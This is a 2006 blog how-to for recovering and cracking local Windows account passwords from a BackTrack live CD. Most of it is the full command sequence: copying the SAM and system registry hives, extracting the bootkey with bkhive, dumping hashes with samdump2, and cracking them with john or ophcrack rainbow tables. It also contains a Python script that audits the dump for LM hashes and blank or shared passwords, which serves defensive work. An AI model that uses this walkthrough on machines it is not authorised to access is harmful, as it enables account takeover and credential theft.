How To: Crack local Windows passwords with Backtrack (+ Downloads)

12 09 2006

Crack local Windows passwords with Backtrack v1.x – neophob

All credit goes to neophob:

A quick and dirty Windows password recovery:

Boot the Backtrack CD.

Change directory to the registry hive directory under your Windows mount point (hda2 here; use whatever partition holds your Windows install):
# cd /mnt/hda2/WINDOWS/system32/config
Copy the SAM and the system Registry hive to the temp dir:
# cp SAM /tmp
# cp system /tmp
Prepare our wordlist:
# cd /pentest/password/dictionaries/
# gunzip -c wordlist.txt.Z > /tmp/words.txt
# cd /tmp

The password hashes in the SAM file are encrypted with a key (called the bootkey, or syskey) that is derived from the system hive, so we extract that key first:
# bkhive system key
Now we can dump the password hashes out of the SAM file:
# samdump2 SAM key > /tmp/hashes.txt

Let's crack those hashes. The easiest case is when the password is in the wordlist, so we try john in wordlist mode first:
# john -w=words.txt -f=NT hashes.txt
No luck? Let's use john's brute-force (incremental) mode:
# john --incremental:all -f=NT hashes.txt

If this takes too long, you could use ophcrack. This tool uses rainbow tables and should crack your hashes in a few seconds, but you need to download those rainbow tables (350 MB or 700 MB, or you can generate them yourself), which are not included on the Backtrack CD (for an obvious reason…). Or you can use the ophcrack online cracker, which should be quite fast.
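As an added example, not part of neophob's write-up, here is a small Python audit script for the dump produced by the samdump2 step. It assumes the pwdump-style line format `user:RID:LM-hash:NT-hash:::` and reports what you want to know before anyone reaches for ophcrack: which accounts still have an LM hash stored (the weak hash the rainbow tables target, which a NoLMHash policy removes), which accounts have no password at all, and which accounts share a password (identical unsalted NT hashes). The sample dump and its hash values are constructed, except for the well-known empty-password LM and NT hash constants.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty password as stored in the SAM (hex).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump in pwdump-style format (user:RID:LM:NT:::).
# All hash values are made up except the empty-password constants.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
HelpAssistant:1002:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

# One dump line: user, decimal RID, 32 hex chars LM, 32 hex chars NT, trailing ':::'.
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_dump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        accounts.append((user, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(accounts):
    """Flag the conditions that make a SAM dump cheap to crack."""
    findings = {"lm_stored": [], "no_password": [], "shared_password": []}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in accounts:
        # A non-empty LM hash means the LM hash is still being stored.
        if lm != EMPTY_LM:
            findings["lm_stored"].append(user)
        # The empty NT hash means the account has no password set
        # (common for disabled built-ins, dangerous for enabled ones).
        if nt == EMPTY_NT:
            findings["no_password"].append(user)
        else:
            by_nt[nt].append(user)
    # NT hashes are unsalted, so equal hashes mean equal passwords.
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

Run it against a real dump by replacing SAMPLE_DUMP with the contents of hashes.txt. An account listed under lm_stored is the one ophcrack's LM tables will recover almost instantly, which is why disabling LM hash storage is the first fix on a system where this dump is possible.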

Credits go to

Hope this helps.



2 responses

19 09 2007

How can I change dir to the Windows mount point? I don't really understand how to do this… tell me point by point what to do after booting the CD.. (backtracker)

19 09 2007
Sarah Webster

Hey, I thought you and your viewers might be interested in this story I wrote in today's Detroit Free Press about Microsoft Auto in the new Ford Focus. They're calling it Sync:
